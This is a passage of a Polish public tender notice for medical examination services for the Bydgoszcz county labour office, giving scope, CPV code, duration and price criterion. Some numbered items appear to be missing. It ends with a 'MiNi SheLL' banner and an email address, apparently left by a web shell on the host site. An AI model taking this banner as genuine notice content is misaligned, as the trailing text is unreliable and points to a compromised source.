4.	Badania lekarskie kierowców muszą być wykonywane zgodnie z rozporządzeniem Ministra Zdrowia z dnia 7 stycznia 2004 r. w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia do kierowania pojazdami (Dz.U. Nr 2, poz. 15 z późn. zm.).

5.	Wykonawca zobowiązany jest zapewnić udział lekarza ze specjalizacją w dziedzinie medycyny pracy w zakładowych komisjach BHP oraz w pracach zespołu ds. oceny ryzyka zawodowego w zakresie przeglądu stanowisk pracy w celu dokonania oceny warunków pracy.

6.	Maksymalna liczba osób skierowanych na badania wynosi 125 osób. Wykonawca otrzyma zapłatę za liczbę faktycznie wykonanych badań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRZEPROWADZANIE BADAŃ LEKARSKICH DLA OSÓB AKTYWIZOWANYCH PRZEZ POWIATOWY URZĄD PRACY W BYDGOSZCZY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w niniejszym postępowaniu przetargowym jest świadczenie usług medycznych w zakresie przeprowadzenia badań lekarskich osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy. Przeprowadzanie badań lekarskich ma na celu stwierdzenie możliwości wykonywania określonych czynności zawodowych wymaganych przepisami ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.) między innymi stwierdzenie zdolności osoby aktywizowanej do wykonywania pracy, uczestnictwa w szkoleniu lub przygotowaniu zawodowym dorosłych, odbywania stażu, wykonywania prac społecznie użytecznych.
2.	Zamawiający będzie kierował osoby na badania określone w szczegółowej kalkulacji kosztów badań - załącznik nr 7b do SIWZ. Jeżeli zaistnieje konieczność przeprowadzenia badań niewymienionych w załączniku nr 7b do SIWZ zamawiający zapłaci za przeprowadzenie tych badań jak za badania wymagające konsultacji lekarza specjalisty (punkt II. 2 tabeli).
3.	Wykonawca jest zobowiązany adekwatnie do wskazanego na skierowaniu stanowiska (grupy zawodowej) lub szkolenia, dobrać rodzaj badań jakie trzeba przeprowadzić zgodnych z obowiązującymi w stosunku do danego zawodu lub szkolenia przepisami, chyba że lekarz stwierdzi celowość przeprowadzenia badań dodatkowych na podstawie wywiadu z osobą skierowaną na badania.
7.	Maksymalna liczba osób skierowanych na badania wynosi 4.200 osób. 
1)	2.800 osób na badania podstawowe,
2)	1.400 osób na badania specjalistyczne.
     Wykonawca otrzyma zapłatę za ilość faktycznie wykonanych badań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com